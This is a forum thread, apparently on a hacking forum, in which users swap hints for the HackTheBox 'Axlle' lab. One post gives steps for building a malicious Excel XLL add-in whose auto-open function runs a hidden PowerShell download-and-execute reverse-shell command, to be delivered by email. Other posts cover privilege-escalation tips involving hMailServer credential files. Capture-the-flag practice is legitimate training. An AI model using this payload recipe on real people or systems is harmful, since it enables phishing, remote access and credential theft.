HTB - Axlle
by Sqweez - Saturday June 22, 2024 at 06:57 PM
#21
xll is just a dll... fml
Reply
#22
someone helpe me how i create a xll archive
Reply
#23
(Jun 23, 2024, 12:17 AM)osamy7593 Wrote:
(Jun 22, 2024, 11:41 PM)bmoon10 Wrote: well here are  other pointers on building a xll file

https://whichbuffer.medium.com/macro-4-0...3c3a0fa697
https://github.com/moohax/xllpoc

 u explain how to get xll from this i can't understand

https://github.com/edparcell/HelloWorldXll


1.you need visual studio dev environment to build the xll file

2.download the excel 2013 sdk from ms website

3.open the HelloWorldXll project in visual c++.

4.change the project properties to include header, library directory from excel 2013 sdk directory and update the excel sdk library file name in the Linker section

5.add the reverse shell download code something like the one given below in the xlAutoOpen function
 - system("powershell -ep bypass -w hidden -Command iex(New-Object Net.WebClient).DownloadString('IP:<PORT>/revsh.ps1'))");
 - Replace the IP, PORT with you IP, PORT

6.build the project for x64 target

7.use the xll with swaks
Reply
#24
(Jun 23, 2024, 01:28 AM)gihimlek Wrote:
(Jun 22, 2024, 11:41 PM)bmoon10 Wrote: well here are  other pointers on building a xll file

https://whichbuffer.medium.com/macro-4-0...3c3a0fa697
https://github.com/moohax/xllpoc

Im using VS 2022 and is full of errors, do I need to install the VS 2015?

i'm able to build the xll from https://github.com/edparcell/HelloWorldXll/tree/master using VS 2022.
download the excel 2013 sdk and change the project to use this.
good luck
Reply
#25
Any hints for low user?

From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.

don't know what to do next. lol
Reply
#26
(Jun 23, 2024, 02:01 AM)jeff1998 Wrote: Any hints for low user?

From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.

don't know what to do next. lol

Search in the folder C:\Program Files (x86)\hMailServer
Reply
#27
guys what payload works in rev.ps1 ? no one works for me

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#28
(Jun 23, 2024, 02:20 AM)standby123 Wrote:
(Jun 23, 2024, 02:01 AM)jeff1998 Wrote: Any hints for low user?

From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.

don't know what to do next. lol

Search in the folder C:\Program Files (x86)\hMailServer

The hash in the hMailServer.INI is not crackable with rockyou
Reply
#29
(Jun 23, 2024, 03:02 AM)saoBFo Wrote:
(Jun 23, 2024, 02:20 AM)standby123 Wrote:
(Jun 23, 2024, 02:01 AM)jeff1998 Wrote: Any hints for low user?

From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.

don't know what to do next. lol

Search in the folder C:\Program Files (x86)\hMailServer

The hash in the hMailServer.INI is not crackable with rockyou

Yeah hmailer theres a decrpyt vbs in addons you can use, I modified it and decrypted the pass from the INI
Reply
#30
(Jun 23, 2024, 03:02 AM)saoBFo Wrote:
(Jun 23, 2024, 02:20 AM)standby123 Wrote:
(Jun 23, 2024, 02:01 AM)jeff1998 Wrote: Any hints for low user?

From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.

don't know what to do next. lol

Search in the folder C:\Program Files (x86)\hMailServer

The hash in the hMailServer.INI is not crackable with rockyou

Hash what hash? search in C:\Program Files (x86)\hMailServer\Data
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,778 8 hours ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,968 Yesterday, 09:54 AM
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,976 Yesterday, 08:48 AM
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,627 Yesterday, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,275 Apr 30, 2026, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)